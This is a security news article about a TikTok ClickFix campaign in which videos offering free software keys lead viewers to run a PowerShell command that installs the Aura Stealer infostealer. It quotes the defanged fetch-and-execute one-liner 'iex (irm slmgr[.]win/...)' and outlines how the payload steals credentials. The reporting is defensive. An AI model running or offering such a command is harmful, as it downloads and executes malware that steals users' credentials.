Cybercriminals are actively leveraging TikTok to distribute information-stealing malware, preying on users looking for free access to popular software. These malicious campaigns involve videos that appear to offer legitimate instructions and product keys for applications like Windows, Microsoft 365, Adobe Premiere, Photoshop, and Netflix Premium. The attack, which has been recently observed by security researchers including ISC Handler Xavier Mertens and previously by Trend Micro, is a prime example of a ClickFix attack, a social engineering technique designed to fool victims into executing dangerous scripts.
This campaign relies on a seemingly simple instruction: the video prompts the viewer to copy and paste a short one-line command and run it in PowerShell with administrator privileges. The command itself, which uses an easily modifiable URL like iex (irm slmgr[.]win/programname), is the key to the infection. The programname portion of the URL changes to match the software being impersonated in the video, making the instruction appear more authentic to the unsuspecting user.
Once the command is executed, PowerShell connects to a remote site to retrieve and run a second, more complex PowerShell script. This secondary script immediately downloads two executables from a service like Cloudflare pages. The first executable, often named updater.exe, is a variant of the potent Aura Stealer malware. Aura Stealer is designed to harvest a wide range of sensitive data, including saved passwords and credentials from web browsers, authentication cookies, cryptocurrency wallet data, and login details for various other applications, uploading all of it to the attackers.
Security researchers have also noted that a second payload, named source.exe, is downloaded. This executable is used to self-compile additional code, which is then injected and launched in the computer’s memory. While the precise function of this secondary payload is not definitively clear, its presence indicates a more sophisticated, multi-stage attack. The entire scheme highlights the growing popularity of ClickFix attacks, which have been observed over the past year distributing various malware strains in ransomware and crypto-theft campaigns.
Given the scope of the data theft, users who have followed these deceptive instructions should assume all of their credentials have been compromised and must immediately reset their passwords on every site they use. As a fundamental security rule, users should never copy text from an unknown or unverified website and execute it in an operating system dialog box or command-line interface, including PowerShell, the Command Prompt, the macOS terminal, or Linux shells, as this is a common vector for malware delivery.
Reference:
